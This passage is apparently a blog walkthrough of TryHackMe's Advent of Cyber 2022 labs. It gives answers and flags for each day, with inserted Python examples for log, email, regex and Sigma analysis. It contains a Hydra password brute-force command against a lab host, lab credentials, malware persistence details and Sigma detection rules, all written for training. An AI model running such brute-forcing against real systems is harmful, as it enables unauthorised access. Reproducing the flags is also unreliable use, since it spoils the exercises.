Introduction

The purpose of this article is to document my journey through the TryHackMe platform. This article will contain answers to the questions provided along with the thought process as to how I obtained them. I will also include any additional notes along the way.

This room is TryHackMe’s annual Christmas holiday event, in which a new room is released with a fresh task every day until the end of December.

Task 1: Introduction

Task 1.1 – Read through this section.

Question 1.1 – Read the above and check out the prizes! 

Answer 1.1 – Click the Submit button to progress to the next task.

Task 2:  Short Tutorial & Rules

Task 2.1 – Read through this section.

Question 2.1 – Practice connecting to our network!

Answer 2.1 – Click the Submit button to progress to the next task.

Task 3:  Our Socials

Task 3.1 – Read through this section.

Question 3.x – Follow us on XXX

Answer 3.x – Click the Submit button on each question to progress to the next task.

Task 4: Subscribing, TryHackMe for Business & Christmas Swag!

Task 4.1 – Read through this section.

Question 4.1 – Read the above.

Answer 4.1 – Click the Submit button to progress to the next task.

Task 5: Nightmare Before Elfmas – The Story

Task 5.1 – Read through this section.

Question 5.1 – The Christmas story is used within some of the tasks, so make sure you read the above.

Answer 5.1 – Click the Submit button to progress to the next task.

Task 6: [Day 1] Frameworks – Someone’s coming to town!

Task 6.1 – Read through this section.

Task 6.2 – Click View Site to visit the task’s site.

Question 6.1 – Who is the adversary that attacked Santa’s network this year?

Answer 6.1 – The Bandit Yeti!

Question 6.2 – What’s the flag that they left behind?

Answer 6.2 – THM{IT’S A Y3T1 CHR1$TMA$}

Question 6.3 – Looking to learn more? Check out the rooms on Unified Kill Chain, Cyber Kill Chain, MITRE, or the whole Cyber Defence Frameworks module!

Answer 6.3 – Click the Submit button to progress to the next task.

Task 7: [Day 2] Log Analysis – Santa’s Naughty & Nice Log

Task 7.1 – Read through this section.

Task 7.2 – Click Start Machine to start the machine.

Task 7.3 – SSH into the machine via its IP address and log in using the credentials elfmcblue:tryhackme!. Alternatively, you can use the built-in AttackBox.

Question 7.1 – Ensure you are connected to the deploy-able machine in this task.

Answer 7.1 – Click the Submit button to progress to the next task.

Question 7.2 –  Use the `ls` command to list the files present in the current directory. How many log files are present?

Answer 7.2 – 2

Question 7.3 – Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?

Answer 7.3 – webserver.log

Question 7.4 – Begin investigating the log file from question #3 to answer the following questions.

Answer 7.4 – Click the Submit button to progress to the next task.

Question 7.5 – On what day was Santa’s naughty and nice list stolen?

Answer 7.5 – Friday

Question 7.6 – What is the IP address of the attacker?

Answer 7.6 – 10.10.249.191

Question 7.7 – What is the name of the important list that the attacker stole from Santa?

Answer 7.7 – santaslist.txt

Question 7.8 – Look through the log files for the flag. The format of the flag is: THM{}

Answer 7.8 – THM{STOLENSANTASLIST}

Question 7.9 – Interested in log analysis? We recommend the Windows Event Logs room or the Endpoint Security Monitoring Module.

Answer 7.9 – Click the Submit button to progress to the next task.
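The Day 2 questions above amount to a small log-analysis procedure: find the requests for the stolen file, read off the client IP, and turn the timestamp into a weekday. The Python below is an added example (not from the room and not part of the original write-up) that does this over a few constructed Apache combined-format lines. The IP addresses, dates and paths in SAMPLE_LOG are made up for the example, and the real webserver.log may use a different format, so the regex is the part you would adjust.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample lines in Apache "combined" log format. They are made up for
# this example and are not the contents of webserver.log from the room.
SAMPLE_LOG = """\
10.10.0.5 - - [18/Nov/2022:12:01:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.249.191 - - [18/Nov/2022:12:02:33 +0000] "GET /admin/ HTTP/1.1" 403 512 "-" "curl/7.68.0"
10.10.249.191 - - [18/Nov/2022:12:02:34 +0000] "GET /santaslist.txt HTTP/1.1" 200 8192 "-" "curl/7.68.0"
10.10.0.7 - - [18/Nov/2022:12:05:00 +0000] "GET /gifts.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
garbage line that does not parse
"""

# One regex for the combined format; named groups keep the field access readable.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        # %z handles the "+0000" offset, so the timestamp is timezone-aware.
        e["when"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def successful_downloads(entries, filename):
    """Requests that actually returned the file (2xx), not just probed for it."""
    return [
        e for e in entries
        if e["method"] == "GET"
        and e["path"].rsplit("/", 1)[-1] == filename
        and 200 <= e["status"] < 300
    ]


def investigate(text, filename):
    """Answer the Day 2 style questions: who took the file, and on what weekday."""
    entries = parse_log(text)
    hits = successful_downloads(entries, filename)
    if not hits:
        return None
    first = hits[0]
    same_client = [e for e in entries if e["ip"] == first["ip"]]
    return {
        "ip": first["ip"],
        "weekday": first["when"].strftime("%A"),
        # How noisy was that client overall? Useful for spotting the scan before the theft.
        "requests_from_ip": len(same_client),
        "status_codes": Counter(e["status"] for e in same_client),
    }


if __name__ == "__main__":
    print(investigate(SAMPLE_LOG, "santaslist.txt"))
```

On the real log the same pattern applies: filter by file name first, then look at everything else that IP did, because the 403s and probes before the download are usually what distinguishes the attacker from a legitimate client.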

Task 8: [Day 3] OSINT – Nothing escapes detective McRed

Task 8.1 – Read through this section.

Question 8.1 – What is the name of the Registrar for the domain santagift.shop?

Answer 8.1 – Namecheap, Inc

Question 8.2 – Find the website’s source code (repository) on github.com and open the file containing sensitive credentials. Can you find the flag?

Answer 8.2 – {THM_OSINT_WORKS}

Question 8.3 – What is the name of the file containing passwords?

Answer 8.3 – config.php

Question 8.4 – What is the name of the QA server associated with the website?

Answer 8.4 – qa.santagift.shop

Question 8.5 – What is the DB_PASSWORD that is being reused between the QA and PROD environments?

Answer 8.5 – [email protected]

Question 8.6 – Check out this room if you’d like to learn more about Google Dorking!

Answer 8.6 – Click the Submit button to progress to the next task.

Task 9: [Day 4] Scanning – Scanning through the snow

Task 9.1 – Read through this section.

Task 9.2 – Click Start Machine to start the machine.

Question 9.1 – What is the name of the HTTP server running on the remote host?

Answer 9.1 – Apache

Question 9.2 – What is the name of the service running on port 22 on the QA server?

Answer 9.2 – ssh

Question 9.3 – What flag can you find after successfully accessing the Samba service?

Answer 9.3 – {THM_SANTA_SMB_SERVER}

Question 9.4 – What is the password for the username santahr?

Answer 9.4 – santa25

Question 9.5 – If you want to learn more scanning techniques, we have a module dedicated to Nmap!

Answer 9.5 – Click the Submit button to progress to the next task.

Task 10: [Day 5] Brute-Forcing – He knows when you’re awake

Task 10.1 – Read through this section.

Task 10.2 – Click Start Machine to start the machine.

Question 10.1 – Use Hydra to find the VNC password of the target with IP address xxx.xxx.xxx.xxx. What is the password?

Answer 10.1 – 1q2w3e4r

Explanation 10.1 – I ran the following command to obtain the password: `hydra -P /usr/share/wordlists/rockyou.txt 10.10.42.197 vnc -V`

Question 10.2 – Using a VNC client on the AttackBox, connect to the target of IP address xxx.xxx.xxx.xxx. What is the flag written on the target’s screen?

Answer 10.2 – THM{I_SEE_YOUR_SCREEN}

Question 10.3 – If you liked the topics presented in this task, check out these rooms next: Protocols and Servers 2, Hydra, Password Attacks, John the Ripper

Answer 10.3 – Click the Submit button to progress to the next task.

Task 11: [Day 6] Email Analysis – It’s beginning to look a lot like phishing

Task 11.1 – Read through this section.

Task 11.2 – Click Start Machine to start the machine.

Task 11.3 – Click Show Split View at the top of the page to connect to the machine.

Question 11.1 – What is the email address of the sender?

Answer 11.1 – [email protected]

Question 11.2 – What is the return address?

Answer 11.2 – [email protected]

Question 11.3 – On whose behalf was the email sent?

Answer 11.3 – Chief Elf

Question 11.4 – What is the X-spam score?

Answer 11.4 – 3

Question 11.5 – What is hidden in the value of the Message-ID field?

Answer 11.5 – AoC2022_Email_Analysis

Explanation 11.5 – After opening the Urgent.eml file in Sublime Text, I found the `Message-ID` field and copied the Base64-encoded value into CyberChef and decoded it there.

Question 11.6 – Visit the email reputation check website provided in the task. What is the reputation result of the sender’s email address?

Answer 11.6 – Risky

Question 11.7 – Check the attachments. What is the filename of the attachment?

Answer 11.7 – Division_of_labour-Load_share_plan.doc

Question 11.8 – What is the hash value of the attachment?

Answer 11.8 – 0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467

Explanation 11.8 – From a terminal, I ran the following command to extract the attachment from the .eml file: `emlAnalyzer -i Urgent\:.eml --extract-all`. Then, I ran `sha256sum Division_of_labour-Load_share_plan.doc` to obtain the SHA256 hash value.

Question 11.9 – Visit the Virus Total website and use the hash value to search. Navigate to the behavior section. What is the second tactic marked in the Mitre ATT&CK section?

Answer 11.9 – Defense Evasion

Question 11.10 – Visit the InQuest website and use the hash value to search. What is the subcategory of the file?

Answer 11.10 – macro_hunter

Question 11.11 – If you want to learn more about phishing and analyzing emails, check out the Phishing module! 

Answer 11.11 – Click the Submit button to progress to the next task.
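The Day 6 work above (read From and Return-Path, note the spam score, decode the Base64 in Message-ID, extract the attachment and hash it) can also be done with Python’s standard library instead of emlAnalyzer and sha256sum. Below is an added example, not code from the room or from the original write-up. The message it parses is built inline from constructed headers and a constructed attachment, so the addresses, the hidden Message-ID value and the resulting hash are illustrative and are not the values from Urgent:.eml.

```python
import base64
import binascii
import hashlib
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed stand-in for a malicious Word document; the bytes are arbitrary.
ATTACHMENT_BYTES = b"constructed bytes standing in for a malicious Word document"


def build_sample_eml():
    """Build a constructed multipart message. Not the room's Urgent:.eml."""
    b64_attachment = base64.b64encode(ATTACHMENT_BYTES).decode()
    hidden = base64.b64encode(b"constructed_hidden_value").decode()
    return (
        "From: Chief Elf <chief.elf@example.test>\r\n"
        "Return-Path: <bounce@attacker.example>\r\n"
        "To: elves@example.test\r\n"
        "Subject: Urgent: load share plan\r\n"
        "X-Spam-Score: 3\r\n"
        f"Message-ID: <{hidden}>\r\n"
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n'
        "\r\n"
        "--b1\r\n"
        'Content-Type: text/plain; charset="utf-8"\r\n'
        "\r\n"
        "Please review the attached plan.\r\n"
        "--b1\r\n"
        "Content-Type: application/msword\r\n"
        'Content-Disposition: attachment; filename="Division_plan.doc"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        "\r\n"
        f"{b64_attachment}\r\n"
        "--b1--\r\n"
    ).encode()


def decode_message_id(message_id):
    """Message-IDs are opaque tokens; one that decodes as Base64 text is unusual
    and worth a look. Returns the decoded text, or None if it is not Base64/UTF-8."""
    if not message_id:
        return None
    token = str(message_id).strip().strip("<>").split("@", 1)[0]
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_eml(raw):
    """Pull the header facts and attachment hashes an analyst wants from an .eml."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True)  # undoes the base64 transfer encoding
        attachments.append({
            "filename": part.get_filename(),
            "content_type": part.get_content_type(),
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
        })
    display, sender = parseaddr(str(msg.get("From", "")))
    return {
        "sender": sender,
        "sender_display": display,
        # A Return-Path that differs from From is a classic phishing tell.
        "return_path": parseaddr(str(msg.get("Return-Path", "")))[1],
        "spam_score": float(msg.get("X-Spam-Score", "nan")),
        "message_id_decoded": decode_message_id(msg.get("Message-ID")),
        "attachments": attachments,
    }


if __name__ == "__main__":
    print(analyze_eml(build_sample_eml()))
```

To use it on a real file, replace `build_sample_eml()` with `open("Urgent:.eml", "rb").read()`; the SHA256 values printed are what you would then submit to VirusTotal or InQuest.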

Task 12: [Day 7] CyberChef – Maldocs roasting on an open fire

Task 12.1 – Read through this section.

Task 12.2 – Click Start Machine to start the machine.

Task 12.3 – Click Show Split View at the top of the page to connect to the machine.

Question 12.1 – What is the version of CyberChef found in the attached VM?

Answer 12.1 – 9.49.0

Question 12.2 – How many recipes were used to extract URLs from the malicious doc?

Answer 12.2 – 10

Question 12.3 – We found a URL that was downloading a suspicious file; what is the name of that malware?

Answer 12.3 – mysterygift.exe

Question 12.4 – What is the last de-fanged URL of the bandityeti domain found in the last step?

Answer 12.4 – hxxps[://]cdn[.]bandityeti[.]THM/files/index/

Question 12.5 – What is the ticket found in one of the domains? (Format: Domain/<GOLDEN_FLAG>)

Answer 12.5 – THM_MYSTERY_FLAG

Question 12.6 – If you liked the investigation today, you might also enjoy the Security Information and Event Management module!

Answer 12.6 – Click the Submit button to progress to the next task.

Task 13: [Day 8] Smart Contracts – Last Christmas I gave you my ETH

Task 13.1 – Read through this section and follow the instructions provided.

Task 13.2 – Click Download Task Files to download the files needed to complete this task.

Question 13.1 – If not already completed, download the zip folder attached to this task, and open Remix in your preferred browser.

Answer 13.1 – Click the Submit button to progress to the next task.

Question 13.2 – What flag is found after attacking the provided EtherStore Contract?

Answer 13.2 – flag{411_ur_37h_15_m1n3}

Question 13.3 – Are you up for a little challenge to celebrate Day 8? Try your hand at these easy challenge rooms: Quotient and Agent T!

Answer 13.3 – Click the Submit button to progress to the next task.

Task 14: [Day 9] Pivoting – Dock the halls

Task 14.1 – Read through this section and follow the instructions provided.

Task 14.2 – Click Start Machine to start the machine.

Question 14.1 – Deploy the attached VM, and wait a few minutes. What ports are open?

Answer 14.1 – 80

Question 14.2 – What framework is the web application developed with?

Answer 14.2 – Laravel

Question 14.3 – What CVE is the application vulnerable to?

Answer 14.3 – CVE-2021-3129

Question 14.4 – What command can be used to upgrade the last opened session to a Meterpreter session?

Answer 14.4 – sessions -u 1

Question 14.5 – What file indicates a session has been opened within a Docker container?

Answer 14.5 – /.dockerenv

Question 14.6 – What file often contains useful credentials for web applications?

Answer 14.6 – .env

Question 14.7 – What database table contains useful credentials?

Answer 14.7 – users

Question 14.8 – What is Santa’s password?

Answer 14.8 – p4$$w0rd

Question 14.9 – What ports are open on the host machine?

Answer 14.9 – 22,80

Question 14.10 – What is the root flag?

Answer 14.10 – THM{47C61A0FA8738BA77308A8A600F88E4B}

Question 14.11 – Day 9 is done! You might want to take a well-deserved rest now. If this challenge was right up your alley, though, we think you might enjoy the Compromising Active Directory module! 

Answer 14.11 – Click the Submit button to progress to the next task.

Task 15: [Day 10] Hack a game – You’re a mean one, Mr. Yeti

Task 15.1 – Read through this section and follow the instructions provided.

Task 15.2 – Click Start Machine to start the machine.

Task 15.3 – Click Show Split View at the top of the page to connect to the machine.

Question 15.1 – What is the Guard’s flag?

Answer 15.1 – THM{5_star_Fl4gzzz}

Question 15.2 – What is the Yeti’s flag?

Answer 15.2 – THM{yetiyetiyetiflagflagflag}

Question 15.3 – If you liked today’s challenge, the Walking an Application room is an excellent follow-up!

Answer 15.3 – Click the Submit button to progress to the next task.

Task 16: [Day 11] Memory Forensics – Not all gifts are nice

Task 16.1 – Read through this section and follow the instructions provided.

Task 16.2 – Click Start Machine to start the machine.

Task 16.3 – Click Show Split View at the top of the page to connect to the machine.

Question 16.1 – What is the Windows version number that the memory image captured?

Answer 16.1 – 10

Question 16.2 – What is the name of the binary/gift that secret Santa left?

Answer 16.2 – mysterygift.exe

Question 16.3 – What is the Process ID (PID) of this binary?

Answer 16.3 – 2040

Question 16.4 – Dump the contents of this binary. How many files are dumped?

Answer 16.4 – 16

Question 16.5 – If you want to learn more about Volatility, please check out a dedicated room here. For more content on forensics, we have a full Digital Forensics and Incident Response module for you!

Answer 16.5 – Click the Submit button to progress to the next task.

Task 17: [Day 12] Malware Analysis – Forensic McBlue to the REVscue!

Task 17.1 – Read through this section and follow the instructions provided.

Task 17.2 – Click Start Machine to start the machine.

Task 17.3 – Click Show Split View at the top of the page to connect to the machine.

Question 17.1 – What is the architecture of the malware sample? (32-bit/64-bit)

Answer 17.1 – 64-bit

Question 17.2 – What is the packer used in the malware sample? (format: lowercase)

Answer 17.2 – upx

Question 17.3 – What is the compiler used to build the malware sample? (format: lowercase)

Answer 17.3 – nim

Question 17.4 – How many MITRE ATT&CK techniques have been discovered attributed to the DISCOVERY tactic?

Answer 17.4 – 2

Question 17.5 – What is the registry key abused by the malware?

Answer 17.5 – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

Question 17.6 – What is the value written on the registry key based on the previous question?

Answer 17.6 – C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat

Question 17.7 – What are the names of two files created by the malware under the C:\Users\Administrator\ directory? (format: file1,file2 in alphabetical order)

Answer 17.7 – test.jpg,wishes.bat

Question 17.8 – What are the two domains wherein malware has initiated a network connection? (format: domain1,domain2 in alphabetical order)

Answer 17.8 – bestfestivalcompany.thm,virustotal.com

Question 17.9 – Going back to strings inside the malware sample, what is the complete URL used to download the file hosted in the first domain accessed by the malware?

Answer 17.9 – @http://bestfestivalcompany.thm/favicon.ico

Question 17.10 – If you enjoyed malware analysis, try the Intro Malware Analysis or Dissecting PE Headers rooms next!

Answer 17.10 – Click the Submit button to progress to the next task.

Task 18: [Day 13] Packet Analysis – Simply having a wonderful pcap time

Task 18.1 – Read through this section and follow the instructions provided.

Task 18.2 – Click Start Machine to start the machine.

Task 18.3 – Click Show Split View at the top of the page to connect to the machine.

Question 18.1 – What is the “Percent Packets” value of the “Hypertext Transfer Protocol”?

Answer 18.1 – 0.3

Question 18.2 – Which port number has received more than 1000 packets?

Answer 18.2 – 3389

Question 18.3 – What is the service name of the used protocol that received more than 1000 packets?

Answer 18.3 – RDP

Question 18.4 – What are the domain names? Enter the domains in alphabetical order and de-fanged format. (format: domain[.]zzz,domain[.]zzz)

Answer 18.4 – bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm

Question 18.5 – What are the names of the requested files? Enter the names in alphabetical order and de-fanged format. (format: domain[.]zzz,domain[.]zzz)

Answer 18.5 – favicon[.]ico,mysterygift[.]exe

Question 18.6 – Which IP address downloaded the executable file?

Answer 18.6 – 10[.]10[.]29[.]186

Question 18.7 – Which domain address hosts the malicious file?

Answer 18.7 – cdn[.]bandityeti[.]thm

Question 18.8 – What is the “user-agent” value used to download the non-executable file?

Answer 18.8 – Nim httpclient/1.6.8

Question 18.9 – Export objects from the PCAP file. Calculate the file hashes. What is the sha256 hash value of the executable file?

Answer 18.9 – 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f

Question 18.10 – Search the hash value of the executable file on VirusTotal. Navigate to the “Behavior” section. There are multiple IP addresses associated with this file. What are the connected IP addresses? Enter the IP addresses de-fanged and in numerical order. (format: IPADDR,IPADDR) Please note that the VT entry changed since the official walkthrough video was recorded – check the VT website to get all the IP addresses you need!

Answer 18.10 – 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

Question 18.11 – If you liked working with Wireshark, we have a comprehensive module on this helpful tool here. If you want to dive deeper, the Network Security and Traffic Analysis module is waiting for you!

Answer 18.11 – Click the Submit button to progress to the next task.

Task 19: [Day 14] Web Applications – I’m dreaming of secure web apps

Task 19.1 – Read through this section and follow the instructions provided.

Task 19.2 – Click Start Machine to start the machine.

Task 19.3 – Access the machine via its IP address over the VPN. Alternatively, you can use the built-in AttackBox.

Question 19.1 – What is the office number of Elf Pivot McRed?

Answer 19.1 – 134

Question 19.2 – Not only profile pages but also stored images are vulnerable. Start with a URL of a valid profile image; what is the hidden flag?

Answer 19.2 – THM{CLOSE_THE_DOOR}

Question 19.3 – Do you like IDOR? It’s an Advent of Cyber classic! If you want more, check out the dedicated room or the Corridor challenge.

Answer 19.3 – Click the Submit button to progress to the next task.

Task 20: [Day 15] Secure Coding – Santa is looking for a Sidekick

Task 20.1 – Read through this section and follow the instructions provided.

Task 20.2 – Click Start Machine to start the machine.

Task 20.3 – Access the machine via its IP address over the VPN. Alternatively, you can use the built-in AttackBox.

Question 20.1 – What is the name given to file uploads that allow threat actors to upload any files that they want?

Answer 20.1 – unrestricted

Question 20.2 – What is the title of the web application developed by Santa’s freelancer?

Answer 20.2 – SantaSidekick2

Question 20.3 – What is the value of the flag stored in the HR Elf’s Documents directory?

Answer 20.3 – THM{Naughty.File.Uploads.Can.Get.You.RCE}

Question 20.4 – What defense technique can be implemented to ensure that specific file types can be uploaded?

Answer 20.4 – file extension validation

Question 20.5 – What defense technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Answer 20.5 – file renaming

Question 20.6 – What defense technique can be used to make sure malicious files that can hurt elves are not uploaded?

Answer 20.6 – malware scanning

Question 20.7 – If you want to learn more about vulnerabilities like this one, check out our Intro to Web Hacking module!

Answer 20.7 – Click the Submit button to progress to the next task.

Task 21: [Day 16] Secure Coding – SQLi’s the king, the carolers sing

Task 21.1 – Read through this section and follow the instructions provided.

Task 21.2 – Click Start Machine to start the machine.

Task 21.3 – Access the machine via its IP address over the VPN. Alternatively, you can use the built-in AttackBox.

Question 21.1 – What is the value of Flag1?

Answer 21.1 – THM{McCode, Elf McCode}

Question 21.2 – What is the value of Flag2?

Answer 21.2 – THM{KodeNRoll}

Question 21.3 – What is the value of Flag3?

Answer 21.3 – THM{Are we secure yet?}

Question 21.4 – What is the value of Flag4?

Answer 21.4 – THM{SQLi_who???}

Question 21.5 – If you’d like more SQLi in your life, check out this room!

Answer 21.5 – Click the Submit button to progress to the next task.

Task 22: [Day 17] Secure Coding – Filtering for Order Amidst Chaos

Task 22.1 – Read through this section and follow the instructions provided.

Task 22.2 – Click Start Machine to start the machine.

Task 22.3 – Click Show Split View at the top of the page to connect to the machine.

Question 22.1 – Filtering for Usernames: How many usernames fit the syntax above?

Answer 22.1 – 8

Explanation 22.1 – `egrep '^[a-zA-Z0-9]{6,12}$' strings` was run to obtain the answer above.

Question 22.2 – Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?

Answer 22.2 – User35

Question 22.3 – Filtering for Emails: How many emails fit the syntax above?

Answer 22.3 – 11

Explanation 22.3 – `egrep '.+[@].+\.[com]{3,3}$' strings` was run to obtain the answer above.

Question 22.4 – Filtering for Emails: How many unique domains are there?

Answer 22.4 – 8

Question 22.5 – Filtering for Emails: What is the domain of the email with the local-part “lewisham44”?

Answer 22.5 – amg.com

Question 22.6 – Filtering for Emails: What is the domain of the email with the local-part “maxximax”?

Answer 22.6 – fedfull.com

Question 22.7 – Filtering for Emails: What is the local-part of the email with the domain name “hotmail.com”?

Answer 22.7 – hussain.volt

Question 22.8 – Filtering for URLs: How many URLs fit the syntax provided?

Answer 22.8 – 16

Explanation 22.8 – `egrep '^http(s)?.{3}(www)?.+\..+$' strings` was run to obtain the answer above.

Question 22.9 – Filtering for URLs: How many of these URLs start with “https”?

Answer 22.9 – 7

Question 22.10 – If you feel like you could use more fundamental skills in your life, try the Linux Fundamentals module. All rooms are free in that one!

Answer 22.10 – Click the Submit button to progress to the next task.
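The Day 17 answers depend entirely on how tightly the regular expressions are written. The Python below is an added example, not the room’s solution and not the commands from the write-up above: it filters a constructed sample of lines with anchored patterns (`re.fullmatch`) for usernames, emails and URLs, pulls local-parts and domains out of the emails, and shows what a loose pattern such as `.+@.+\.[com]{3}` additionally accepts. The syntax rules encoded in the three patterns are this example’s assumptions (6–12 alphanumerics for a username, a `.com` address for an email, `http`/`https` with an optional `www.` for a URL), not text quoted from the room, so counts on the real `strings` file may differ.

```python
import re

# Patterns assumed for this example (an interpretation of the room's stated
# syntax, not quoted from it). fullmatch() makes ^ and $ implicit, so a line has
# to consist of the item and nothing else.
USERNAME_RE = re.compile(r"[A-Za-z0-9]{6,12}")
EMAIL_RE = re.compile(r"[A-Za-z0-9._-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.com")
URL_RE = re.compile(r"https?://(?:www\.)?[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+(?:/\S*)?")

# Constructed input standing in for the room's `strings` file.
SAMPLE_LINES = [
    "User35",                 # readable word + number, exactly 6 chars
    "abc123xyz",
    "short",                  # 5 chars: too short for a username
    "Q7h2Zk9",
    "this_has_underscore",    # underscore is not alphanumeric
    "WayTooLongUsername123",  # 21 chars
    "lewisham44@amg.com",
    "maxximax@fedfull.com",
    "hussain.volt@hotmail.com",
    "dup@amg.com",            # second address on an already-seen domain
    "bad@site.org",           # not .com
    "noatsign.com",
    "x@y.ccc",                # only a sloppy pattern accepts this
    "a space@in it.moc",      # ditto: unanchored .+ happily spans spaces
    "https://www.example.com/path",
    "http://example.org",
    "http://www.tryhackme.com/room",
    "https://cdn.bandityeti.thm/files/index/",
    "ftp://example.com",      # wrong scheme
    "https://noTLD",          # host needs at least one dot
]


def filter_usernames(lines):
    return [line for line in lines if USERNAME_RE.fullmatch(line)]


def filter_emails(lines):
    return [line for line in lines if EMAIL_RE.fullmatch(line)]


def filter_urls(lines):
    return [line for line in lines if URL_RE.fullmatch(line)]


def email_parts(addr):
    """Split on the LAST @; the local-part may legally contain one in quoted form."""
    local, domain = addr.rsplit("@", 1)
    return local, domain.lower()


def unique_domains(emails):
    return sorted({email_parts(e)[1] for e in emails})


def lookup_domain(emails, local_part):
    """Domain of the address whose local-part is `local_part`, or None."""
    for e in emails:
        local, domain = email_parts(e)
        if local == local_part:
            return domain
    return None


def https_only(urls):
    return [u for u in urls if u.startswith("https://")]


def lenient_vs_strict(lines):
    """Lines a sloppy email pattern accepts that the strict one rejects.
    `[com]{3}` is a character CLASS, so it also matches 'ccc', 'moc' or 'ooo', and
    an unanchored `.+` on either side of the @ swallows spaces and punctuation."""
    lenient = re.compile(r".+@.+\.[com]{3}")
    loose = {line for line in lines if lenient.fullmatch(line)}
    return sorted(loose - set(filter_emails(lines)))


if __name__ == "__main__":
    emails = filter_emails(SAMPLE_LINES)
    print(len(filter_usernames(SAMPLE_LINES)), "usernames")
    print(len(emails), "emails across", unique_domains(emails))
    print(len(filter_urls(SAMPLE_LINES)), "URLs, of which", len(https_only(filter_urls(SAMPLE_LINES))), "https")
    print("accepted only by the loose pattern:", lenient_vs_strict(SAMPLE_LINES))
```

The same patterns can be fed to `grep -E` if you anchor them with `^` and `$` yourself; the point of `lenient_vs_strict` is that a count obtained with a loose pattern can be off by exactly the junk lines it lets through.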

Task 23: [Day 18] Sigma – Lumberjack Lenny Learns New Rules

Task 23.1 – Read through this section and follow the instructions provided.

Task 23.2 – Click Start Machine to start the machine.

Task 23.3 – Access the machine via its IP address over the VPN. Alternatively, you can use the built-in AttackBox.

Question 23.1 – What is the Challenge #1 flag?

Answer 23.1 – THM{n0t_just_your_u$ser}

Explanation 23.1 – The following is the YAML file I used to obtain the flag:

title: Suspicious Local Account Creation
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4720
  condition: selection

Question 23.2 – From the Challenge 1 log, what user account was created?

Answer 23.2 – BanditYetiMini

Question 23.3 – What is the Challenge #2 flag?

Answer 23.3 – THM{[email protected]_1s_Runn1ng_H3r3}

Explanation 23.3 – The following is the YAML file I used to obtain the flag:

title: susp_software_discovery
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID: 1
    Image|endswith: '\reg.exe'
    CommandLine|contains|all:
      - 'Internet Explorer'
      - '/v svcVersion'
  condition: selection

Question 23.4 – What was the User’s path in the Challenge #2 log file?

Answer 23.4 – SIGMA_AOC2022\Bandit Yeti

Question 23.5 – What is the Challenge #3 flag?

Answer 23.5 – THM{sch3dule_0npo1nt_101}

Explanation 23.5 – The following is the YAML file I used to obtain the flag:

title: schtasks_creation
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID: 1
    Image|endswith: 'schtasks.exe'
    CommandLine|contains|all:
      - '/create'
  condition: selection

Question 23.6 – What was the MD5 hash associated with Challenge #3 logs?

Answer 23.6 – 2F6CE97FAF2D5EEA919E4393BDD416A7

Question 23.7 – Did you like learning about detection? Check out the Yara room to learn more!

Answer 23.7 – Click the Submit button to progress to the next task.
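The three Sigma rules above say what to look for but not how a matcher applies field modifiers such as `|endswith` and `|contains|all`. The Python below is an added example, not the room’s backend and not the rule files from the write-up: a minimal evaluator for rules whose condition is a single `selection`, run over a handful of constructed event records (a 4720 account creation, a reg.exe query, a schtasks /create, and two benign events). It mirrors the three rules as Python dicts rather than parsing YAML so that it runs with the standard library only, ignores `logsource`, and supports just the modifiers used here; real Sigma also handles wildcards, regex and base64 modifiers, and compound conditions.

```python
# Minimal Sigma-style matcher for rules whose condition is just `selection`.
# Sigma compares strings case-insensitively by default, which is mirrored here;
# wildcards (*, ?), |re, |base64 and compound conditions are NOT implemented.

# The three rules from the write-up, transcribed as dicts (logsource omitted:
# routing a rule to the right log source is outside this matcher's scope).
RULES = [
    {
        "title": "Suspicious Local Account Creation",
        "detection": {"selection": {"EventID": 4720}, "condition": "selection"},
    },
    {
        "title": "susp_software_discovery",
        "detection": {
            "selection": {
                "EventID": 1,
                "Image|endswith": "\\reg.exe",
                "CommandLine|contains|all": ["Internet Explorer", "/v svcVersion"],
            },
            "condition": "selection",
        },
    },
    {
        "title": "schtasks_creation",
        "detection": {
            "selection": {
                "EventID": 1,
                "Image|endswith": "schtasks.exe",
                "CommandLine|contains|all": ["/create"],
            },
            "condition": "selection",
        },
    },
]

# Constructed events standing in for Security / Sysmon records already
# normalised to Sigma field names. Not the room's logs.
EVENTS = [
    {"id": "e1", "EventID": 4720, "TargetUserName": "BanditYetiMini", "SubjectUserName": "Administrator"},
    {"id": "e2", "EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKLM\SOFTWARE\Microsoft\Internet Explorer" /v svcVersion'},
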